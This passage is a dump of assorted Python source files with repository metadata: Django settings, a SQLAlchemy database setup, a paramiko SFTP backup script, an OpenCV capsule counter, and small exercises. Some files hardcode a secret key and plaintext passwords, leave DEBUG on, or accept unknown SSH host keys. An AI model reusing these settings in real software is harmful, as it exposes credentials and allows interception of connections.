print(c2.method1())
print(c2.method2())
class Class3(Class1):
def method2(self):
return 'm2'
c3 = Class3()
print(c3, c3.method1())
print(c3, c3.method2())
| [
"[email protected]"
] | |
ae185b44883b5e50aa15019ae93c4ab05a147aa7 | 2863d91df18eb2462840466b70339382c79195ff | /String.py | d61c6fde5822b00c418e40342cb9933aef846c5d | [] | no_license | girish3349/OrangeHRMPOM | 2651b9529a58bc91367aa77cc5d97e9f181f1a39 | 1f2df7237db9d30f56bc06b4827cdd0bc45a5efd | refs/heads/master | 2022-12-13T07:23:42.740421 | 2020-09-20T13:17:47 | 2020-09-20T13:17:47 | 297,077,658 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 136 | py | fullName = "Gbellamkonda"
var3 = "38.9details like"
print(fullName)
print(var3)
print(var3[-12:])
print(var3.split("details like")) | [
"[email protected]"
] | |
87befa3eef830cbc6a7f0a12aa9dcac32bf9c495 | baaa3a4d6cc9f9e465726ba11647ca9a3e431a7e | /IN1000/Trix 6/løkker_og_prosedyrer.py | 361179363b5e189e21c11724eb82d81781e3d59c | [] | no_license | MehCheniti/Python | 671d430868e1b8eeafabd7ecb1cf6684ab5c6858 | 1e1dc38dc874e03cb248664ff48f3cb2d497c6e5 | refs/heads/master | 2022-05-28T03:05:31.336202 | 2022-03-11T19:55:46 | 2022-03-11T19:55:46 | 206,413,523 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 186 | py | def skriv_med_trykk(param):
    print(param + "!")
i = 0
while i < 5:
    inn = input("Give me an expletive! ")
    if inn.lower() == "no":
        break
    skriv_med_trykk(inn)
    i += 1  # advance the counter so the loop actually stops after five rounds
| [
"[email protected]"
] | |
7699469afadfdc6c434ad8ec90f34b76384bc63f | eacd408becd79432b0f29f5f68b9d1c1a5623cf8 | /manage.py | 0f0ab42991580189005c267294b0725352847a98 | [] | no_license | fedediaz1234/Margarita | ca1f7b4fbe171a68153dde7d14cbb9a22e78e73c | e05e09ea3e3da3516c25ef1f23049d289d24dcf9 | refs/heads/master | 2020-12-23T15:25:37.886604 | 2017-05-27T01:44:12 | 2017-05-27T01:44:12 | 92,561,858 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "margarita.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| [
"[email protected]"
] | |
e4d33d6c45c1787d86533381a8c9f8f4fffc20cd | 66dda4d91cc9979efa4ea07e6abf461e47c04bdf | /database.py | 5b4be0e60d87cdbd5228ec6db4170f97eca7777f | [] | no_license | 0xlearner/FastAPI-Stock-Screener | e69ea15fa23b56eac894ec62a3ff2d8e1d4d1c36 | 09b8936dbbaf28cfdf9c304761ff8ca352c5effb | refs/heads/main | 2023-06-14T22:52:37.350488 | 2021-07-03T13:17:43 | 2021-07-03T13:17:43 | 382,618,316 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 468 | py | from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
SQLALCHEMY_DATABASE_URL = "postgresql+psycopg2://postgres:password@db:5432/stocks_db"
engine = create_engine(SQLALCHEMY_DATABASE_URL)
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)
Base = declarative_base()
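# get_db() below is a request-scoped session dependency. A typical FastAPI
# usage sketch (the route and the Stock model here are illustrative
# assumptions, not necessarily how this repo wires it up):
#
#   from fastapi import Depends, FastAPI
#   from sqlalchemy.orm import Session
#
#   app = FastAPI()
#
#   @app.get("/stocks")
#   def read_stocks(db: Session = Depends(get_db)):
#       return db.query(Stock).all()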
def get_db():
db = SessionLocal()
try:
yield db
    finally:  # release the session on success as well as on error
db.close() | [
"[email protected]"
] | |
e6519c8185a748057c68378fbdedde5727fb3be9 | 19a09ec3b59810dfca1d3470414ee51479cc0507 | /code.py | 74259be646b7625d7191de8633e4a9e91cfc550c | [] | no_license | rlavrinenko/backup_with_python | dbf3b019c0d4b3f28844efd29a7a2bbe26c6134b | 487d10c9c109ee333cc7e0df2b248ba5ae23a0c4 | refs/heads/master | 2022-12-01T04:02:20.558495 | 2020-07-28T17:21:41 | 2020-07-28T17:21:41 | 283,279,844 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 655 | py | import os, datetime, pyminizip, paramiko
now = datetime.datetime.now()
date=now.strftime("%Y%m%d")
password=now.strftime("P@ssw0rd%Y%m%dpleaseEnter") # Password with your own phrase
os.chdir('d:\TMP')
compression_level = 5
pyminizip.compress("d:\TMP\file.xxx", "", "TMP"+ date +".zip", password, compression_level)
zipfile="TMP"+ date +".zip"
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect('ip', username="user", password="pass")
sftp = ssh.open_sftp()
localpath = "TMP"+ date +".zip"
remotepath = '/remdir/' + zipfile
sftp.put(zipfile, remotepath)
sftp.close()
ssh.close()
os.remove(zipfile) | [
"[email protected]"
] | |
860f068da1da4f29f84e6c9876de48c0f9dfcd68 | f7be1846da14366ca8277dc3edc207766de838f0 | /Codeforces/407d2B.py | 32c1d8dc337f18ce961e89378a05bddfd08f824f | [] | no_license | IsThatYou/Competitive-Programming | d440f9e78f8a982cd60aa8c81833b9e10208b29e | a924ac7087654402c7f7c4b62374c377178061ad | refs/heads/master | 2020-07-19T16:31:32.492635 | 2019-01-27T02:45:21 | 2019-01-27T02:45:21 | 73,759,128 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 980 | py | b1,q,l,m = [int(i) for i in input().split()]
bad = [int(i) for i in input().split()]
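# Approach: when |q| > 1 and b1 != 0 the terms grow strictly in absolute value,
# so the loop below walks the progression until |term| > l and counts only the
# terms not listed as "bad". Every other shape of (b1, q) either repeats values
# forever ("inf") or writes finitely many terms, handled case by case below.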
if abs(q) > 1 and b1 != 0:
b2 = b1
count = 0
while abs(b2) <= l:
count += 1
if b2 in bad:
count-=1
b2 *= q
'''
for u in bad:
i = u
while (i%q == 0):
i = i / q
a = i == b1
if a:
break
a = i == b1
if (a and abs(u)<=l) or u == b1:
count-=1
'''
print(count)
else:
'''
if abs(b1)<=l:
if q == 1:
if b1 in bad:
print("0")
else:
print("inf")
elif q == 0:
if 0 in bad:
if b1 in bad:
print("0")
else:
print("1")
else:
print("inf")
elif q == -1:
if (b1 in bad) and (b2 in bad):
print("0")
else:
print("inf")
else:
print("0")
'''
a1 = b1 * q
if abs(b1) <= l:
if b1 == 0:
if b1 in bad:
print("0")
else:
print("inf")
elif a1 in bad:
if b1 in bad:
print("0")
else:
if a1 == 0:
print("1")
else:
print("inf")
else:
print("inf")
else:
print("0") | [
"[email protected]"
] | |
2e847f42310ca02b1e0a0171f8165b72640288c8 | 7d1a1f66ebefe567a83cef342c3d5896e59ddbdf | /PublicServer/supervision/apps.py | 9f2d5cce5a4c587aa6224fafeb75c3b85ced5701 | [
"MIT"
] | permissive | CodeathonURV/CodeathonURV2016_Raspi | b944d7546e55af18148f5e1001e133a5aeb997b5 | 4eecd7ea86e8845bd1d0f4d5c3747f5e61b0214e | refs/heads/master | 2021-01-18T12:17:55.387695 | 2016-02-14T15:43:04 | 2016-02-14T15:43:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 138 | py | from __future__ import unicode_literals
from django.apps import AppConfig
class SupervisionConfig(AppConfig):
name = 'supervision'
| [
"[email protected]"
] | |
cb91ae92c3397a0cba27896e52806faee64dc228 | 2c74bb301f1ed83b79254944183ac5a18a639fdf | /homeassistant/components/moehlenhoff_alpha2/binary_sensor.py | ddd92c3a70b2e0dd303e31693cb0d6f19d25c601 | [
"Apache-2.0"
] | permissive | Adminiuga/home-assistant | 5bec93007ddac1a268cc359bf7e48530c5f73b38 | dcf68d768e4f628d038f1fdd6e40bad713fbc222 | refs/heads/dev | 2023-02-22T22:03:31.013931 | 2022-11-09T00:27:20 | 2022-11-09T00:27:20 | 123,929,062 | 5 | 4 | Apache-2.0 | 2023-02-22T06:14:31 | 2018-03-05T14:11:09 | Python | UTF-8 | Python | false | false | 2,029 | py | """Support for Alpha2 IO device battery sensors."""
from homeassistant.components.binary_sensor import (
BinarySensorDeviceClass,
BinarySensorEntity,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity import EntityCategory
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.update_coordinator import CoordinatorEntity
from . import Alpha2BaseCoordinator
from .const import DOMAIN
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Add Alpha2 sensor entities from a config_entry."""
coordinator: Alpha2BaseCoordinator = hass.data[DOMAIN][config_entry.entry_id]
async_add_entities(
Alpha2IODeviceBatterySensor(coordinator, io_device_id)
for io_device_id, io_device in coordinator.data["io_devices"].items()
if io_device["_HEATAREA_ID"]
)
class Alpha2IODeviceBatterySensor(
CoordinatorEntity[Alpha2BaseCoordinator], BinarySensorEntity
):
"""Alpha2 IO device battery binary sensor."""
_attr_device_class = BinarySensorDeviceClass.BATTERY
_attr_entity_category = EntityCategory.DIAGNOSTIC
def __init__(self, coordinator: Alpha2BaseCoordinator, io_device_id: str) -> None:
"""Initialize Alpha2IODeviceBatterySensor."""
super().__init__(coordinator)
self.io_device_id = io_device_id
self._attr_unique_id = f"{io_device_id}:battery"
io_device = self.coordinator.data["io_devices"][io_device_id]
heat_area = self.coordinator.data["heat_areas"][io_device["_HEATAREA_ID"]]
self._attr_name = (
f"{heat_area['HEATAREA_NAME']} IO device {io_device['NR']} battery"
)
@property
def is_on(self):
"""Return the state of the sensor."""
# 0=empty, 1=weak, 2=good
return self.coordinator.data["io_devices"][self.io_device_id]["BATTERY"] < 2
| [
"[email protected]"
] | |
73fc658fab6493e02d2e855c1be858adfa5c027a | 173016e62bcca69fc36b7888c1784ad599756ed5 | /special-number.py | 052c75cc895d21debe53294ffab805775e2d8a4e | [] | no_license | dogac00/Python-Problems | c9415a1e3f8fbf5418088bfe94564e3e4d6b388e | 057674477cd3c8fc2de550bb512eeb8ab5edba2e | refs/heads/master | 2020-03-18T00:28:39.154471 | 2019-07-11T20:48:29 | 2019-07-11T20:48:29 | 134,096,575 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 259 | py | # A number is a Special Number if it’s digits only consist 0, 1, 2, 3, 4 or 5.
# Given a number determine if it special number or not.
special = set("012345")
def special_number(number):
return "Special!!" if set(str(number)) <= special else "NOT!!"
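# Quick illustration (an added sketch, not part of the original kata solution):
if __name__ == "__main__":
    print(special_number(2))   # Special!! -- its only digit, 2, is within 0-5
    print(special_number(39))  # NOT!!     -- the digit 9 falls outside 0-5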
| [
"[email protected]"
] | |
ecb35b2b5b2cc20842256f8d6e32bd90ac048300 | 0ebf0f176b41aa3980ace85f1249f196f71d22d6 | /shoppingly/settings.py | 71cca9af8a965de2a61015c4dc4259fdfcf21b4c | [] | no_license | daps07/dookhim | 8f9c155e64416323cda698c7f5e9060638e33e72 | 3637651ffd20fd9440ff3dbe044d946d948a54d7 | refs/heads/master | 2023-07-16T06:46:16.235730 | 2021-08-26T04:57:59 | 2021-08-26T04:57:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,606 | py | """
Django settings for shoppingly project.
Generated by 'django-admin startproject' using Django 3.2.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
import os
import django_heroku
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-e*nh=lwh^k5*9%$=67#fo$g%r6rfsehns&oomdzee9)!y^jtky'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'app',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'shoppingly.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'shoppingly.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
MEDIA_URL = '/media/'
MEDIA_ROOT = BASE_DIR / 'media'
LOGIN_REDIRECT_URL = '/profile/'
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
SESSION_ENGINE = 'django.contrib.sessions.backends.db'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
# Activate Django-Heroku.
django_heroku.settings(locals())
| [
"[email protected]"
] | |
c90971e822880fb2fb37f91db15ca2a3e3469a1c | 7a7c0cd1b38a306e7d51a67f6442fc0b48ae83a0 | /Exam/32.py | 8866719e4820db9cd84c8c34e69467ed23826fb6 | [] | no_license | 09-03/Infa | f06fd007ded30101b289730ef0ea12154e3f7317 | a7896461435650a6d3865047ed09ec9dadd4b493 | refs/heads/master | 2023-06-10T16:48:06.440654 | 2021-06-29T00:43:27 | 2021-06-29T00:43:27 | 297,751,033 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,551 | py | """
Implement a program that performs list operations: adding and removing
elements, sorting, determining the list length, inserting an element,
finding the index of an element, and so on.
"""
def add(lst, element):
    lst.append(element)
    return print(f"List after adding element {element}: {lst}")
def delete(lst, element):
    lst.remove(element)
    return print(f"List after removing element {element}: {lst}")
def bubbleSort(lst):
    for i in range(len(lst)-1):
        for j in range(0, len(lst)-i-1):
            if lst[j] > lst[j+1]:
                lst[j], lst[j+1] = lst[j+1], lst[j]
    return print(f"Sorted list: {lst}")
def length(lst):
    return print(f"List length: {len(lst)}")
def insert(lst, element):
    index = int(input("Enter the insertion index: "))
    lst.insert(index, element)
    return print(f"List after inserting the element: {lst}")
def find_index(lst, element):
    return print(f"Element {element} has index: {lst.index(element)}")
massive = [25, -6, 6, 6, 0, 11, 20, 1]
add(massive.copy(), "a")
delete(massive.copy(), 0)
bubbleSort(massive.copy())
length(massive.copy())
insert(massive.copy(), "b")
find_index(massive.copy(), -6)
| [
"[email protected]"
] | |
768ebcd4aa20e78c05d5254425ac413fdac7a839 | 0cb8a6b9789e5304c3f25263d2844ac8527f7314 | /exporter/lib/constants.py | 41d677407cbd92c3d35ce85d6232665e0ae1757e | [
"MIT"
] | permissive | fossabot/crypto-exporter | bc1e2a133fcf7bd3d9b9d1c6ff673a7ca18ef900 | 2f83e478aaed06f7077ff777bc1c6373220f8535 | refs/heads/master | 2021-01-08T10:40:48.977894 | 2020-02-20T22:44:40 | 2020-02-20T22:44:40 | 242,006,322 | 0 | 0 | MIT | 2020-02-20T22:44:40 | 2020-02-20T22:44:39 | null | UTF-8 | Python | false | false | 253 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
""" Constants declarations """
WARN_TICKER_SLOW_LOAD = 'Exchange doesn\'t support fetching all the tickers in one go. Loading them individually.'
# These get set at build time
VERSION = None
BUILD = None
| [
"[email protected]"
] | |
3abacad4b1fea836f4f8aa72c5adec65edcd4d41 | 725ed24c59988dc379df3c67503fad8a6ae65db2 | /code/03/ex070.py | 29e0fcbd10c69b315aea9268e447eafff575b0d8 | [] | no_license | oleg7521/Althoff_1 | 587990cfdca98f7dd8df029addc0df940d7556c7 | 8496ec9f2078af13ae9f7fd5783da89492590ac7 | refs/heads/master | 2020-05-21T11:38:38.228038 | 2019-05-10T18:09:13 | 2019-05-10T18:09:13 | 186,033,314 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68 | py | x = 10
y = 11
if x == 10:
if y == 11:
print(x + y)
| [
"[email protected]"
] | |
019b88ab66515b1fba73c088c4c4378affc6f9d1 | b48b5334c49552176616c7bcc0d55ce2d13e476e | /bigo/day-11-floyd-warshall/risk.py | 4a86303b90f93d4870faa5efc2b01b9938781bf6 | [] | no_license | huyngopt1994/python-Algorithm | 75ff16e01aa9e227690e639a9b9bcd997f374c6b | 13b10f9e99af74a6a096623e9094f89701bbb1b6 | refs/heads/master | 2021-07-13T01:03:56.919559 | 2020-06-01T02:49:32 | 2020-06-01T02:49:32 | 136,141,405 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 184 | py | # https://uva.onlinejudge.org/index.php?Itemid=8&option=com_onlinejudge&page=show_problem&problem=508
if __name__ == '__main__':
for _ in range(19):
custom_input = input()
| [
"[email protected]"
] | |
ab57fa7710ac29fb77ef57c4c4e1a95d1adb1b50 | 9c6608e9906c6cb710ae4714268bc7c13f46cb88 | /common/common.py | d18b7dacd4cb0746fe022b671e5978664dd8df3d | [] | no_license | vpluzhnikov/anywhere | a5715fbc95d88ce126437461a42210b57c6db691 | c2c5d6644695a9c0c1b236d87de582a590effdfb | refs/heads/master | 2020-03-08T16:05:15.546578 | 2018-04-06T08:44:52 | 2018-04-06T08:44:52 | 128,230,035 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 409 | py | import logging
import json
LOGFILENAME = 'anywhere.log'
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',
datefmt='%m-%d %H:%M',
filename=LOGFILENAME,
filemode='w')
logger = logging.getLogger(__name__)
def load_config(configfile):
with open(configfile) as json_conf_file:
config = json.load(json_conf_file)
return config | [
"[email protected]"
] | |
8162335c1dd204110849637430097ff8bf123131 | ae7c6f13c9875aa3bd0a2e481ff26e2839db5399 | /video_test_count_crop.py | 6b6e4b51aca3f7f230e3dd614e54603643a58fec | [] | no_license | SEAI-SEPCAP/Classification | f3c813e094d5e61253d08af9b753556d6097683a | 2feb325e4e5294824643b5d360bf3f80e989261f | refs/heads/main | 2023-02-08T05:43:04.178393 | 2020-12-04T23:46:52 | 2020-12-04T23:46:52 | 314,586,861 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,512 | py | import numpy as np
import cv2 as cv
flag = 0
old_flag = 1
capsule_count = 0
def click(event, x, y, flags, param):
if event == cv.EVENT_LBUTTONDOWN:
print(frame[y,x])
print(y)
def nothing(x):
pass
def area(w, h):
return w * h
def color_in_frame(image):
colors_detected = []
area_list = []
boundaries = [
([80,80,220],[110,110,255], 'red'),
([90,120,50],[120,160,110], 'dark green'),
([185,200,160],[210,220,180], 'light green'),
([220,220,220],[255,255,255], 'white'),
([100,210,230],[130,230,255], 'nude'),
([50,200,220],[80,240,255], 'yellow'),
([100,170,220],[130,210,255], 'orange')
]
mask = cv.inRange(image, np.array([0,0,0]) , np.array([85,85,85]))
mask = (255 - mask)
rect = thresh_callback(image, mask, 100)
if len(rect) == 1 and area(rect[0][2],rect[0][3]) > 6000:
crop = image[rect[0][1]:rect[0][1] + rect[0][3], rect[0][0]:rect[0][0] + rect[0][2]]
cv.imshow("crop", crop)
for (lower,upper, color) in boundaries:
lower = np.array(lower, dtype = 'uint8')
upper = np.array(upper, dtype= 'uint8')
if cv.inRange(crop, lower, upper).any():
colors_detected.append(color)
#print(colors_detected)
else:
colors_detected = []
#area_list.append(area(v[2],values[3]))
#print("Area sum: ",sum(area_list))
#print(colors_detected)
#if sum(area_list) > 5000:
#print("Colors Detected: ", colors_detected)
#print(sum(area_list))
return colors_detected
##output = cv.bitwise_and(image, image, mask=mask)
##else:
## print("Color not detected" + color)
#if 'output' in vars():
# cv.imshow("image",np.hstack([image,output]))
def thresh_callback(image, gray_image, val):
threshold = val
#canny_output = cv.Canny(gray_image, threshold, threshold * 2)
#cv.imshow("Canny", gray_image)
contours, _ = cv.findContours(gray_image, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)
contours_poly = [None] * len(contours)
boundRect = [None] * len(contours)
finalRect = []
## boundingRect returns x, y, w, h -> w is width and h is height
## Rect area equals w*h
## if len boundRect = 1 and area is bigger than a certain limit, check colors in frame ( or middle of rect) and return
## if len boundRect = 2 and both area is bigger than a certain limit, check colors in frame (or middle of rect) and return
for i, c in enumerate(contours):
contours_poly[i] = cv.approxPolyDP(c,3,True)
boundRect[i] = cv.boundingRect(contours_poly[i])
for i, values in enumerate(boundRect):
# print(area(boundRect[i][2], boundRect[i][3]))
if area(boundRect[i][2], boundRect[i][3]) > 2000:
finalRect.append(boundRect[i])
#print(finalRect)
final_img = image
for i in range(0,len(finalRect)):
color = (0,255,255)
color_rect = (0, 255, 0)
#cv.drawContours(drawing, contours_poly, i, color)
#cv.rectangle(drawing, (int(boundRect[i][0]), int(boundRect[i][1])), \
# (int(boundRect[i][0]+boundRect[i][2]), int(boundRect[i][1]+boundRect[i][3])), color_rect, 2)
#if 140 < (finalRect[i][1]+finalRect[i][3]/2) < 350:
cv.rectangle(final_img, (int(finalRect[i][0]), int(finalRect[i][1])), \
(int(finalRect[i][0]+finalRect[i][2]), int(finalRect[i][1]+finalRect[i][3])), color_rect, 2)
#cv.putText(final_img,'White', (60,120),cv.FONT_HERSHEY_PLAIN,0.8, (255,255,255), 1)
#cv.putText(final_img,'Red', (120,120),cv.FONT_HERSHEY_PLAIN,0.8, (0,0,255), 1)
#cv.imshow('Contours', drawing)
cv.imshow('Square image', final_img)
return finalRect
##MAIN
cap = cv.VideoCapture("videos\\video_4s.mp4")
cv.namedWindow("Trackbars",)
cv.createTrackbar("lb","Trackbars",0,255,nothing)
cv.createTrackbar("lg","Trackbars",0,255,nothing)
cv.createTrackbar("lr","Trackbars",0,255,nothing)
cv.createTrackbar("ub","Trackbars",255,255,nothing)
cv.createTrackbar("ug","Trackbars",255,255,nothing)
cv.createTrackbar("ur","Trackbars",255,255,nothing)
while(cap.isOpened()):
e1 = cv.getTickCount()
ret, frame = cap.read()
if not ret:
break
gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)
gray = cv.blur(gray, (3,3))
#frame = cv.blur(frame, (3,3))
#frame = cv.bilateralFilter(frame, 45, 75, 75)
frame = cv.medianBlur(frame,9)
#height, width = frame.shape[:2]
#frame = cv.resize(frame,(width/5, height/5), interpolation = cv.INTER_CUBIC)
#hsv = cv.cvtColor(frame,cv.COLOR_BGR2HSV)
#cv.imshow("hsv", hsv)
lb = cv.getTrackbarPos("lb","Trackbars")
lg = cv.getTrackbarPos("lg","Trackbars")
lr = cv.getTrackbarPos("lr","Trackbars")
ub = cv.getTrackbarPos("ub","Trackbars")
ug = cv.getTrackbarPos("ug","Trackbars")
ur = cv.getTrackbarPos("ur","Trackbars")
l_blue = np.array([lb,lg,lr])
u_blue = np.array([ub,ug,ur])
mask = cv.inRange(frame, l_blue, u_blue)
result = cv.bitwise_and(frame,frame,mask=mask)
#cv.imshow('frame', frame)
thresh = 100
#thresh_callback(frame, cv.cvtColor(result, cv.COLOR_BGR2GRAY), thresh)
colors = color_in_frame(frame)
#print("Flag before: ",flag)
#print(colors)
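    # Edge detection on "capsule visible": count a capsule only on the
    # transition from an empty frame to detected colors, and re-arm the
    # counter once the frame is empty again.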
if (colors != [] and flag == 0) and old_flag == 1:
old_flag = flag
flag = 1
print("Capsule detected: ", colors)
capsule_count = capsule_count + 1
elif (colors == [] and flag == 1) and old_flag == 0:
old_flag = flag
flag = 0
print("Capsule not in frame")
#print("Flag: ", flag)
#print("Old Flag: ", old_flag)
cv.imshow("frame", frame)
cv.setMouseCallback("frame", click)
#cv.imshow("mask", mask)
#cv.imshow("result",result)
if cv.waitKey(1) == ord('q'):
break
e2 = cv.getTickCount()
time = (e2 - e1) / cv.getTickFrequency()
print(time)
print("Total capsules: ", capsule_count)
cap.release()
cv.destroyAllWindows()
| [
"[email protected]"
] | |
7e2b777cfb3f7c9a50c6bf7b30d0dddd2f52c364 | ab9aae2cbe16502e52c6a728a68e1f0ea3e8b8d0 | /mysite/urls.py | 88dc1bfdbeacdca983c2c354bb1afc79d410d3cf | [] | no_license | leftcoastbeard/djangotest | e9e7f53581d47f467225ab86f9f262fed628d3de | 938c523c1cd8c684bd2dbd8760827ea6213d4a1b | refs/heads/master | 2021-04-09T11:52:02.892976 | 2018-03-28T17:42:00 | 2018-03-28T17:42:00 | 125,576,248 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 863 | py | """mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
# path('polls/', include('polls.urls', namespace="polls")),
path('polls/', include('polls.urls')),
path('admin/', admin.site.urls),
]
| [
"[email protected]"
] | |
e068501920dd3f8e922106ad3892c04f9f024937 | 0ecebfeb8dda622fc2cecf896ee36e1fa02377e0 | /day2/s1/search/src/aliyun-opensearch-python-sdk-master/opensearch/__init__.py | 916274eea16288321b075449ca3a5127a969cecf | [] | no_license | jianchangfeng/RecommentSystem | 06a2473e4770b875402800969c0dcef56e0e7ab5 | 44bff601830667a46d96ea8d8e976dd3d792f4d5 | refs/heads/master | 2020-06-16T07:54:39.223628 | 2019-09-27T13:32:56 | 2019-09-27T13:32:56 | 195,517,034 | 1 | 0 | null | 2020-03-16T21:32:21 | 2019-07-06T08:35:23 | TSQL | UTF-8 | Python | false | false | 191 | py | from . import const
from .client import Client
from .app import IndexApp
from .document import IndexDoc
from .search import Search
from .suggest import Suggest
from .errorlog import ErrorLog
| [
"[email protected]"
] | |
b747250572a94ec53e231cbc946c58362081b1c1 | 586f064a78f5fb5d191ded4a6b9e5c01d0216abf | /source/pybass/tests/test_flac_win.py | aa3266e49ff4123b994a60821531e3da41a77e91 | [
"MIT"
] | permissive | peppy0510/PyMusicPlayer | b114e01702d0d709d5fdb072aa2b35012fc2bcd4 | b63801283fee774f3d33ef3e54aeaa9e8147be18 | refs/heads/master | 2023-06-29T03:12:28.093206 | 2023-06-19T02:38:41 | 2023-06-19T02:38:41 | 177,516,389 | 25 | 6 | null | null | null | null | UTF-8 | Python | false | false | 535 | py | # -*- coding: utf-8 -*-
# Copyright(c) Wasylews 2013 ([email protected])
from pybass import BASS_Free
from pybass import BASS_Init
from pybass import BASS_PluginLoad
from pybass import BASS_StreamCreateFile
from pybass import play_handle
def main():
BASS_Init(-1, 44100, 0, 0, 0)
plugin = BASS_PluginLoad(b'bass_flac.dll', 0)
print('plugin = %d' % plugin)
handle = BASS_StreamCreateFile(False, b'test.flac', 0, 0, 0)
play_handle(handle, show_tags=False)
BASS_Free()
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
de225fcb243c2a0f60999ef44906408c12a0d636 | b6377fda02fd483cfb760983d48274a9f28a9c3a | /src/recipes/recipe_scraper.py | 271db63313c81a064f4577c0c2119877d85ce024 | [] | no_license | nykznykz/CourseProject | 8ebb18de771c679d9c3961c1ca0e36d526909019 | 6db546e2c10a23de12bc24b452c2e759b19ae6ea | refs/heads/main | 2023-01-30T01:51:16.100598 | 2020-12-13T20:46:42 | 2020-12-13T20:46:42 | 307,244,102 | 0 | 1 | null | 2020-12-13T12:22:41 | 2020-10-26T02:43:18 | Python | UTF-8 | Python | false | false | 21,380 | py |
import csv
import json
import multiprocessing
import pandas
import re
import sys
import time
import unicodedata
import urllib
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.action_chains import ActionChains
import os.path
from os import path
# Constants
RECIPE_CSV_FIELDNAMES = ['id', 'url', 'title', 'summary', 'category', 'breadcrumb', 'rating_average',
'rating_count', 'rating_detail', 'info', 'ingredients', 'directions', 'notes',
'nutrition', 'main_image', 'ugc_image']
RESULT_CSV_PATH = '../data/recipes.csv'
def is_valid_recipe_url(url):
"""Check whether the given url is a valid recipe url.
Args:
url: Url to check.
Returns:
